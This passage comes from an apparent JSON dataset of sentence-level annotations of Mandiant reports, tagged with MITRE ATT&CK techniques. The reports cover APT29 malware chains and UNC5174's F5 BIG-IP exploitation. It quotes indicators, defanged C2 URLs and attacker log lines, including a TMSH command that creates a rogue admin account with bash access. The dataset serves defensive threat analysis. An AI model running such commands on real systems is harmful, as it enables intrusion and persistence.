1d54c487e6c8a08517fdb8efedfcd459 (DONUT)", "sentence_text": "lu.ed.bin (MD5:1d54c487e6c8a08517fdb8efedfcd459)\nDONUT dropper\nDropped by 595d8ea258ef8d8ec70b0e8a740e903c (DONUT)\nDrops 7a5988423f731d8b36d01926e715dd11 (SPICYBEAT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s130-4a0e9e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "lu.ed.bin (MD5:1d54c487e6c8a08517fdb8efedfcd459)\nDONUT dropper\nDropped by 595d8ea258ef8d8ec70b0e8a740e903c (DONUT)\nDrops 7a5988423f731d8b36d01926e715dd11 (SPICYBEAT)", "sentence_text": "SPICYBEAT downloader (7a5988423f731d8b36d01926e715dd11)\nCompiled on: 2023/05/11 14:51:55 Dropped by 1d54c487e6c8a08517fdb8efedfcd459 (DONUT)\nConnects to https://graph.microsoft[.]com/v1.0/me/drives/442834D38635845C/root:/Apps/legron_application:/children Drops 41944bb155ecf70193245d8c3485dd2e (BEACON)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "SPICYBEAT connects to Microsoft Graph API to access cloud storage and drops the BEACON payload as a next stage", "entities": [ { "text": "SPICYBEAT downloader", "start": 0, "end": 20, "label": "MalwareTool" }, { "text": "BEACON", "start": 295, "end": 301, "label": "MalwareTool" }, { "text": "https://graph.microsoft[.]com/v1.0/me/drives/442834D38635845C/root:/Apps/legron_application:/children", "start": 153, "end": 254, "label": "Infrastructure_Indicator" }, { "text": "Connects to", "start": 141, "end": 152, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s131-fd4ac3", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "SPICYBEAT downloader (7a5988423f731d8b36d01926e715dd11)\nCompiled on: 2023/05/11 14:51:55 Dropped by 1d54c487e6c8a08517fdb8efedfcd459 (DONUT)\nConnects to https://graph.microsoft[.]com/v1.0/me/drives/442834D38635845C/root:/Apps/legron_application:/children Drops 41944bb155ecf70193245d8c3485dd2e (BEACON)", "sentence_text": "Client_id: 5470384d-91c9-40f3-8891-8fb375c7df62\nApplication Name: legron_application Authentication URL: https://graph.microsoft[.]com/v1.0/me/drive/root:/Apps/ legron_application", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s132-829424", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "Client_id: 5470384d-91c9-40f3-8891-8fb375c7df62\nApplication Name: legron_application Authentication URL: https://graph.microsoft[.]com/v1.0/me/drive/root:/Apps/ legron_application", "sentence_text": "Unknown (MD5:41944bb155ecf70193245d8c3485dd2e)\nBEACON backdoor\nDownloaded from OneDrive Dropped by 7a5988423f731d8b36d01926e715dd11 (SPICYBEAT)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "SPICYBEAT downloads the BEACON backdoor from OneDrive as a next-stage payload", "entities": [ { "text": "BEACON backdoor", "start": 47, "end": 62, "label": "MalwareTool" }, { "text": " OneDrive", "start": 78, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "SPICYBEAT", "start": 133, "end": 142, "label": "MalwareTool" }, { "text": "Downloaded from OneDrive", "start": 63, "end": 87, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s133-318b26", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Unknown (MD5:41944bb155ecf70193245d8c3485dd2e)\nBEACON backdoor\nDownloaded from OneDrive Dropped by 7a5988423f731d8b36d01926e715dd11 (SPICYBEAT)", "sentence_text": "Resolves zone kitaeri[.]com Connects to https://kitaeri[.]com/images Connects to https://kitaeri[.]com/gen_204 June 2023:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s134-10bc7c", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "Resolves zone kitaeri[.]com Connects to https://kitaeri[.]com/images Connects to https://kitaeri[.]com/gen_204 June 2023:", "sentence_text": "Split ROOTSAW Campaign invitation.svg (MD5: 295527e2e38da97167979ade004de880)\nROOTSAW dropper\nAttached to emails referencing “santa lucia celebration” Drops 800f766f728a4418b0c682a867673341 invitation.iso (MD5: 800f766f728a4418b0c682a867673341)\nISO containing next stages Dropped by 295527e2e38da97167979ade004de880 Drops 5e1389b494edc86e17ff1783ed6b9d37 (STATICNOISE)\nDrops 9e51506816ad620c9e6474c52a9004a6\nDrops 301a7273418bceaa3fb15b15f69dd32a\nDrops b48a16fdf890283cac7484ef0911a1f2\nCCLEANER.dll (MD5: 5e1389b494edc86e17ff1783ed6b9d37)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s135-eef43f", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "Split ROOTSAW Campaign invitation.svg (MD5: 295527e2e38da97167979ade004de880)\nROOTSAW dropper\nAttached to emails referencing “santa lucia celebration” Drops 800f766f728a4418b0c682a867673341 invitation.iso (MD5: 800f766f728a4418b0c682a867673341)\nISO containing next stages Dropped by 295527e2e38da97167979ade004de880 Drops 5e1389b494edc86e17ff1783ed6b9d37 (STATICNOISE)\nDrops 9e51506816ad620c9e6474c52a9004a6\nDrops 301a7273418bceaa3fb15b15f69dd32a\nDrops b48a16fdf890283cac7484ef0911a1f2\nCCLEANER.dll (MD5: 5e1389b494edc86e17ff1783ed6b9d37)", "sentence_text": "STATICNOISE downloader\nSide loaded by 301a7273418bceaa3fb15b15f69dd32a Downloads from https://kegas[.]id/search/s=1&id=APOX8NWOV4 INVITATI.LNK (MD5: 9e51506816ad620c9e6474c52a9004a6)", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "STATICNOISE is side-loaded via a malicious DLL and downloads additional content from a remote web server", "entities": [ { "text": "STATICNOISE downloader", "start": 0, "end": 22, "label": "MalwareTool" }, { "text": " https://kegas[.]id/search/s=1&id=APOX8NWOV4", "start": 85, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "Side loaded by 301a7273418bceaa3fb15b15f69dd32a Downloads from", "start": 23, "end": 85, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s136-14f378", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "STATICNOISE downloader\nSide loaded by 301a7273418bceaa3fb15b15f69dd32a Downloads from https://kegas[.]id/search/s=1&id=APOX8NWOV4 INVITATI.LNK (MD5: 9e51506816ad620c9e6474c52a9004a6)", "sentence_text": "LNK launcher\nCopies content of ISO to c:\\Windows\\Tasks and executes CCLeanerReactivator (301a7273418bceaa3fb15b15f69dd32a)\nCCleanerReactivator.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s137-a8efcf", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "LNK launcher\nCopies content of ISO to c:\\Windows\\Tasks and executes CCLeanerReactivator (301a7273418bceaa3fb15b15f69dd32a)\nCCleanerReactivator.", "sentence_text": "EXE (MD5: 301a7273418bceaa3fb15b15f69dd32a)\nLegitimate CCleaner executable Side loads 5e1389b494edc86e17ff1783ed6b9d37 (STATICNOISE)\nJuly 2023: ICEBEAT Campaign Invitation_Farewell_DE_EMB.pdf (MD5: fc53c75289309ffb7f65a3513e7519eb)\nMalicious PDF document Drops 78062da99751c0a520ca4ac9fa59af73 (ROOTSAW)\nInvitation_Farewell_DE_EMB.html (MD5: 78062da99751c0a520ca4ac9fa59af73)\nROOTSAW dropper\nDropped by fc53c75289309ffb7f65a3513e7519eb (ROOTSAW)\nConnects to https://sgrhf[.]org.pk/wp-content/idx.php?n=ks&q= Drops d6986d991c41afcc2e71fc30bde851d1 invitation_farewell_de_emb.zip (MD5: d6986d991c41afcc2e71fc30bde851d1)\nMalicious ZIP containing HTA smuggler Dropped by 78062da99751c0a520ca4ac9fa59af73 (ROOTSAW)\nDrops d67f83dcda6d01bedf08a51df7415d14\ninvitation_farewell_de_emb.hta (MD5: d67f83dcda6d01bedf08a51df7415d14)\nMalicious HTML smuggler Dropped by d6986d991c41afcc2e71fc30bde851d1 Drops 0be11b4f34ede748892ea49e473d82db (ICEBEAT)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s138-abf555", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "EXE (MD5: 301a7273418bceaa3fb15b15f69dd32a)\nLegitimate CCleaner executable Side loads 5e1389b494edc86e17ff1783ed6b9d37 (STATICNOISE)\nJuly 2023: ICEBEAT Campaign Invitation_Farewell_DE_EMB.pdf (MD5: fc53c75289309ffb7f65a3513e7519eb)\nMalicious PDF document Drops 78062da99751c0a520ca4ac9fa59af73 (ROOTSAW)\nInvitation_Farewell_DE_EMB.html (MD5: 78062da99751c0a520ca4ac9fa59af73)\nROOTSAW dropper\nDropped by fc53c75289309ffb7f65a3513e7519eb (ROOTSAW)\nConnects to https://sgrhf[.]org.pk/wp-content/idx.php?n=ks&q= Drops d6986d991c41afcc2e71fc30bde851d1 invitation_farewell_de_emb.zip (MD5: d6986d991c41afcc2e71fc30bde851d1)\nMalicious ZIP containing HTA smuggler Dropped by 78062da99751c0a520ca4ac9fa59af73 (ROOTSAW)\nDrops d67f83dcda6d01bedf08a51df7415d14\ninvitation_farewell_de_emb.hta (MD5: d67f83dcda6d01bedf08a51df7415d14)\nMalicious HTML smuggler Dropped by d6986d991c41afcc2e71fc30bde851d1 Drops 0be11b4f34ede748892ea49e473d82db (ICEBEAT)", "sentence_text": "Drops dfbdd308e22898f680b6c2c8eb052fb5\nDrops 4f744666d2a2dc95419208c61e42f163\nPosted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s139-ee4b1a", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "Drops dfbdd308e22898f680b6c2c8eb052fb5\nDrops 4f744666d2a2dc95419208c61e42f163\nPosted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nInitial Access | Phishing (T1566) Spearphishing Attachment (T1566.001)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s140-00aa2a", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nInitial Access | Phishing (T1566) Spearphishing Attachment (T1566.001)", "sentence_text": "Spearphishing Link (T1566.002) External Remote Services (T1133)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s141-3902cd", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "Spearphishing Link (T1566.002) External Remote Services (T1133)", "sentence_text": "Persistence | Scheduled Task/Job (T1053) Scheduled task (T1053.005)\nPrivilege Escalation | Process Injection (T1055) Scheduled Task (T1053) Scheduled task (T1053.005)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s142-eb96cd", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "Persistence | Scheduled Task/Job (T1053) Scheduled task (T1053.005)\nPrivilege Escalation | Process Injection (T1055) Scheduled Task (T1053) Scheduled task (T1053.005)", "sentence_text": "Discovery | Process Discovery (T1057) Software Discovery (T1518) Query Registry (T1012) Account Discovery (T1087) Local Account (T1087.001)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s143-bf47fd", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "Discovery | Process Discovery (T1057) Software Discovery (T1518) Query Registry (T1012) Account Discovery (T1087) Local Account (T1087.001)", "sentence_text": "Domain Account (T1087.002) System Information Discovery (T1082) File and Directory Discovery (T1083)\nCommand and Control | Web Service (T1102) Application Layer Protocol (T1071) Web Protocols (T1071.001) DNS (T1071.004) Encrypted Channel (T1573) Asymmetric Cryptography (T1573.002) Non-Application layer Protocol (T1095)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s144-2dee11", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "Domain Account (T1087.002) System Information Discovery (T1082) File and Directory Discovery (T1083)\nCommand and Control | Web Service (T1102) Application Layer Protocol (T1071) Web Protocols (T1071.001) DNS (T1071.004) Encrypted Channel (T1573) Asymmetric Cryptography (T1573.002) Non-Application layer Protocol (T1095)", "sentence_text": "Non-Standard Port (T1571) Ingress Tool Transfer (T1105)\nExfiltration | Data Transfer Size Limits (T1030)\nA106-551 | Phishing Email - Malicious Link, APT29, MUSKYBEAT, Variant #1 A106-542 | Command and Control - APT29, MUSKYBEAT , DNS Query", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s145-2fd1fe", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "Non-Standard Port (T1571) Ingress Tool Transfer (T1105)\nExfiltration | Data Transfer Size Limits (T1030)\nA106-551 | Phishing Email - Malicious Link, APT29, MUSKYBEAT, Variant #1 A106-542 | Command and Control - APT29, MUSKYBEAT , DNS Query", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s1-f73b75", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect | Google Cloud Blog Threat Intelligence Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect March 21, 2024 Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploited CVE-2023-46747 in F5 BIG-IP Traffic Management User Interface to gain initial access", "entities": [ { "text": "Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect", "start": 46, "end": 98, "label": "Action" }, { "text": "F5 BIG-IP (CVE-2023-46747)", "start": 193, "end": 219, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s2-302ff7", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect | Google Cloud Blog Threat Intelligence Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect March 21, 2024 Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface.", "sentence_text": "Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Actor exploited ConnectWise ScreenConnect vulnerability CVE-2024-1709 for initial access.", "entities": [ { "text": "exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor", "start": 44, "end": 117, "label": "Action" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s3-61806f", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor.", "sentence_text": "This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s4-c246f0", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.", "sentence_text": "ConnectWise ScreenConnect vulnerability ( CVE-2024-1709 ) to compromise hundreds of institutions primarily in the U.S. and Canada.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s5-066e80", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "ConnectWise ScreenConnect vulnerability ( CVE-2024-1709 ) to compromise hundreds of institutions primarily in the U.S. and Canada.", "sentence_text": "The actor appears primarily focused on executing access operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s6-93e664", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "The actor appears primarily focused on executing access operations.", "sentence_text": "ConnectWise ScreenConnect Vulnerability CVE-2024-1709 F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747 Atlassian Confluence CVE-2023-22518 Linux Kernel Exploit CVE-2022-0185 Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525 Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s7-d6600c", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "ConnectWise ScreenConnect Vulnerability CVE-2024-1709 F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747 Atlassian Confluence CVE-2023-22518 Linux Kernel Exploit CVE-2022-0185 Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525 Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history.", "sentence_text": "Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s8-aa8286", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.", "sentence_text": "Initial Disclosure of CVE-2023-46747 On Oct. 25, 2023, Praetorian published an advisory and proof-of-concept (PoC) for a zero-day (0-day) vulnerability ( CVE-2023-46747 ) impacting the F5 BIG-IP Traffic Management User Interface (TMUI).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s9-95f2e0", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "Initial Disclosure of CVE-2023-46747 On Oct. 25, 2023, Praetorian published an advisory and proof-of-concept (PoC) for a zero-day (0-day) vulnerability ( CVE-2023-46747 ) impacting the F5 BIG-IP Traffic Management User Interface (TMUI).", "sentence_text": "This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s10-e432ce", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user.", "sentence_text": "The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s11-d5572a", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH).", "sentence_text": "The advisory detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s12-d59a9d", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "The advisory detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability.", "sentence_text": "Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.\nEvidence of Exploitation /var/log/audit \" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1136", "name": "Create Account" }, { "id": "T1059.004", "name": "Command and Scripting Interpreter: Unix Shell" } ], "procedure": "Create new administrative user accounts and execute bash commands via TMSH on compromised F5 BIG-IP systems.", "entities": [ { "text": "creation of new admin user accounts", "start": 233, "end": 268, "label": "Action" }, { "text": "bash commands executed by the newly created user via the F5's TMSH", "start": 273, "end": 339, "label": "Action" }, { "text": "TMSH", "start": 335, "end": 339, "label": "MalwareTool" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s13-044860", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.\nEvidence of Exploitation /var/log/audit \" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH.", "sentence_text": "This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:\n/etc/passwd\n/etc/shadow\nThe creation of the user's home directory was also replicated at /home/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s14-8ab2ec", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:\n/etc/passwd\n/etc/shadow\nThe creation of the user's home directory was also replicated at /home/", "sentence_text": "Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]:\n01420002:5:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s15-918a8b", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]:\n01420002:5:", "sentence_text": "AUDIT - pid=30629 user=root folder=/Common module=(tmos)# status=[Command OK] cmd_data=create auth user f5support3 password **** shell bash partition-access add { all-partitions { role admin } }", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s16-526ed5", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "AUDIT - pid=30629 user=root folder=/Common module=(tmos)# status=[Command OK] cmd_data=create auth user f5support3 password **** shell bash partition-access add { all-partitions { role admin } }", "sentence_text": "Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]:\n01420002:5:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s17-4fad33", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]:\n01420002:5:", "sentence_text": "AUDIT - pid=18778 user=f5support3 folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c id", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s18-11e213", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "AUDIT - pid=18778 user=f5support3 folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c id", "sentence_text": "The \" /var/log/restjavad-audit.log \" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s19-02c6f2", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "The \" /var/log/restjavad-audit.log \" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address.", "sentence_text": "In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user \" f5support3 \".", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Command and Scripting Interpreter: Unix Shell" } ], "procedure": "UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user f5support3.", "entities": [ { "text": "UNC5174", "start": 26, "end": 33, "label": "ThreatActor" }, { "text": "authenticated", "start": 34, "end": 47, "label": "Action" }, { "text": "executed bash commands", "start": 52, "end": 74, "label": "Action" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s20-2b48bd", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user \" f5support3 \".", "sentence_text": "The following log entries show the f5support3 user executing bash commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s21-3e35ad", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "The following log entries show the f5support3 user executing bash commands.", "sentence_text": "The body of the POST request contains the bash command being executed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s22-b90a2e", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "The body of the POST request contains the bash command being executed.", "sentence_text": "[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker]\n{\"user\":\"local/f5support3\",\"method\":\"PATCH\",\"uri\":\"http://localhost:8100\n/mgmt/shared/authz/users/f5support3\",\"status\":200,\"from\":\"154.12.177[.]8\"}\nUNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:\nF5support3\nF5_admin\nf5_support\nPost-Exploitation Tactics by UNC5174 After Successful Account Creation SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL UNC5174 leveraged their newly minted TMSH access to download and execute \"/tmp/watchsys\" using a cURL command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s23-dc7a14", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker]\n{\"user\":\"local/f5support3\",\"method\":\"PATCH\",\"uri\":\"http://localhost:8100\n/mgmt/shared/authz/users/f5support3\",\"status\":200,\"from\":\"154.12.177[.]8\"}\nUNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:\nF5support3\nF5_admin\nf5_support\nPost-Exploitation Tactics by UNC5174 After Successful Account Creation SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL UNC5174 leveraged their newly minted TMSH access to download and execute \"/tmp/watchsys\" using a cURL 